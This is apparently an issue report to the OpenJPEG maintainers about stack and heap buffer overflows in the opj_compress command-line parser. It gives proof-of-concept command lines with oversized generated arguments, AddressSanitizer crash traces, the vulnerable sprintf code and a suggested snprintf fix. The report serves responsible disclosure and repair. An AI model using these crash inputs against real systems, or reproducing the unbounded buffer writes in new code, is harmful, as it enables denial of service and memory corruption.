[Bug] Protential stack-buffer-overflow crash in `opj_compress.c`

[ShangzhiXu]

Hi team! Thanks for your great work!
I think I found a small vulnerability that might lead to crash in the system.

It locates at the parse_cmdline_encoder function in src/bin/jp2/opj_compress.c. The vulnerability occurs because the command-line argument parser uses sprintf at line 712 to copy a user-controlled string into a fixed-size stack buffer char outformat[50]; at line 710 without bounds checking, causing a stack buffer overflow.

PoC

we can run
./bin/opj_compress -OutFor $(python3 -c "print('A'*80)")
and we can see the following crash

=================================================================
==2036569==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcf77a7752 at pc 0x7a9a2a85f04f bp 0x7ffcf77a7040 sp 0x7ffcf77a67d0
WRITE of size 82 at 0x7ffcf77a7752 thread T0
    #0 0x7a9a2a85f04e in __interceptor_vsprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1687
    #1 0x7a9a2a85f27e in __interceptor_sprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1730
    #2 0x5d0829ad80c8 in parse_cmdline_encoder /openjpeg/src/bin/jp2/opj_compress.c:712
    #3 0x5d0829ade660 in main /openjpeg/src/bin/jp2/opj_compress.c:1970
    #4 0x7a9a2a229d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #5 0x7a9a2a229e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #6 0x5d0829ad3ba4 in _start (/openjpeg/build-asan/bin/opj_compress+0xbba4)

Root Causes

The crash is caused by the handling of the 'O' case (associated with -OutFor option). A fixed-size stack buffer outformat of 50 bytes is declared, but sprintf is used to append the user-provided string of (from opj_optarg) to it without verifying if the length exceeds the buffer size.

        case 'O': {         /* output format */
            char outformat[50]; // Fixed 50-byte stack buffer
            char *of = opj_optarg;
            sprintf(outformat, ".%s", of); // Unbounded write if 'of' > 48 chars
            img_fol->set_out_format = 1;
            parameters->cod_format = get_file_format(outformat);
            // ...

Fix

I've checked the file and I think replacing sprintf with snprintf to limit the number of bytes written would be the safest fix. Alternatively, checking the length of of before writing to the buffer would also prevent the overflow.

[ShangzhiXu]

Actually there are many this kind of crash

Can I create a PR to fix them?I noticed that there is already a filter in place

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -q $(python3 -c "print(','.join(['30']*50000))")
-bash: ./opj_compress: Argument list too long

but it does not seem sufficient for handling these cases.

Crashes

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -c $(python3 -c "print(','.join(['[128,128]']*5000))")
=================================================================
==1581998==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fcc77a09d60 at pc 0x557bc4b3e2e1 bp 0x7ffe8f0762a0 sp 0x7ffe8f075a28
WRITE of size 4 at 0x7fcc77a09d60 thread T0
    #0 0x557bc4b3e2e0 in scanf_common(void*, int, bool, char const*, __va_list_tag*) /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors_format.inc:342:5
    #1 0x557bc4b3efbc in __interceptor___isoc99_vsscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1612:1
    #2 0x557bc4b3efbc in __interceptor___isoc99_sscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1635:1
    #3 0x557bc4bdec2b in parse_cmdline_encoder /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:964:23
    #4 0x557bc4bdbc84 in main /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1970:9
    #5 0x7fcc79cf47e4 in __libc_start_main (/lib64/libc.so.6+0x3a7e4) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #6 0x557bc4b1c92d in _start (/srv/scratch/z5500277/fuz/openjpeg/build-asan/bin/opj_compress+0x2c92d)

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -r $(python3 -c "print(','.join(['20']*5000))")
=================================================================
==1583433==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fb257609d60 at pc 0x55f00b2502e1 bp 0x7fffcf63f440 sp 0x7fffcf63ebc8
WRITE of size 4 at 0x7fb257609d60 thread T0
    #0 0x55f00b2502e0 in scanf_common(void*, int, bool, char const*, __va_list_tag*) /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors_format.inc:342:5
    #1 0x55f00b250fbc in __interceptor___isoc99_vsscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1612:1
    #2 0x55f00b250fbc in __interceptor___isoc99_sscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1635:1
    #3 0x55f00b2f0611 in parse_cmdline_encoder /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:734:20
    #4 0x55f00b2edc84 in main /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1970:9
    #5 0x7fb2598bb7e4 in __libc_start_main (/lib64/libc.so.6+0x3a7e4) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #6 0x55f00b22e92d in _start (/srv/scratch/z5500277/fuz/openjpeg/build-asan/bin/opj_compress+0x2c92d)

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -q $(python3 -c "print(','.join(['30']*5000))")
=================================================================
==1583653==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f0b18f09d60 at pc 0x55a8597ed2e1 bp 0x7ffceeeb6420 sp 0x7ffceeeb5ba8
WRITE of size 4 at 0x7f0b18f09d60 thread T0
    #0 0x55a8597ed2e0 in scanf_common(void*, int, bool, char const*, __va_list_tag*) /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors_format.inc:342:5
    #1 0x55a8597edfbc in __interceptor___isoc99_vsscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1612:1
    #2 0x55a8597edfbc in __interceptor___isoc99_sscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1635:1
    #3 0x55a85988ee56 in parse_cmdline_encoder /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:851:20
    #4 0x55a85988ac84 in main /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1970:9
    #5 0x7f0b1b1967e4 in __libc_start_main (/lib64/libc.so.6+0x3a7e4) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #6 0x55a8597cb92d in _start (/srv/scratch/z5500277/fuz/openjpeg/build-asan/bin/opj_compress+0x2c92d)

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -POC $(python3 -c "print('/'.join(['T1=3735928559,3735928559,3735928559,3735928559,3735928559,CPRL']*1000))")
=================================================================
==1587306==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f5775b09d80 at pc 0x562a068a72e1 bp 0x7ffc9a8d1140 sp 0x7ffc9a8d08c8
WRITE of size 4 at 0x7f5775b09d80 thread T0
    #0 0x562a068a72e0 in scanf_common(void*, int, bool, char const*, __va_list_tag*) /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors_format.inc:342:5
    #1 0x562a068a7fbc in __interceptor___isoc99_vsscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1612:1
    #2 0x562a068a7fbc in __interceptor___isoc99_sscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1635:1
    #3 0x562a06947b3f in parse_cmdline_encoder /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1066:20
    #4 0x562a06944c84 in main /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1970:9
    #5 0x7f5777d867e4 in __libc_start_main (/lib64/libc.so.6+0x3a7e4) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #6 0x562a0688592d in _start (/srv/scratch/z5500277/fuz/openjpeg/build-asan/bin/opj_compress+0x2c92d)

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -n 20000 -f 1
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1591266==ERROR: AddressSanitizer: stack-overflow on address 0x7ffeb830c000 (pc 0x7fb959e4f938 bp 0x7ffeb830c000 sp 0x7ffeb8308ae8 T0)
    #0 0x7fb959e4f938 in __rawmemchr_evex (/lib64/libc.so.6+0xb9938) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #1 0x7fb959e2b2f5 in _IO_str_init_static_internal (/lib64/libc.so.6+0x952f5) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #2 0x7fb959e19f10 in __isoc99_vsscanf (/lib64/libc.so.6+0x83f10) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #3 0x559fbc033fa0 in __interceptor___isoc99_vsscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1612:1
    #4 0x559fbc033fa0 in __interceptor___isoc99_sscanf /dev/shm/apps/spack-stage/spack-stage-llvm-15.0.4-tf66zkctjzcicavphkm52rhma6rkbt6n/spack-src/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1635:1
    #5 0x559fbc0d488c in parse_cmdline_encoder /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:902:21
    #6 0x559fbc0d0c84 in main /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1970:9
    #7 0x7fb959dd07e4 in __libc_start_main (/lib64/libc.so.6+0x3a7e4) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #8 0x559fbc01192d in _start (/srv/scratch/z5500277/fuz/openjpeg/build-asan/bin/opj_compress+0x2c92d)

SUMMARY: AddressSanitizer: stack-overflow (/lib64/libc.so.6+0xb9938) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec) in __rawmemchr_evex
==1591266==ABORTING

z5500277@katana3:.../build-asan/bin $ ./opj_compress -i dummy.bmp -o out.j2k -n 1431655766 -f 1
=================================================================
==1594916==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018 at pc 0x562a31a6d278 bp 0x7fff79b6fdf0 sp 0x7fff79b6fde8
WRITE of size 4 at 0x602000000018 thread T0
    #0 0x562a31a6d277 in parse_cmdline_encoder /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:899:24
    #1 0x562a31a64c84 in main /srv/scratch/z5500277/fuz/openjpeg/src/bin/jp2/opj_compress.c:1970:9
    #2 0x7f87158cb7e4 in __libc_start_main (/lib64/libc.so.6+0x3a7e4) (BuildId: 9846edf82646848f2857c47c5a2eb71c288059ec)
    #3 0x562a319a592d in _start (/srv/scratch/z5500277/fuz/openjpeg/build-asan/bin/opj_compress+0x2c92d)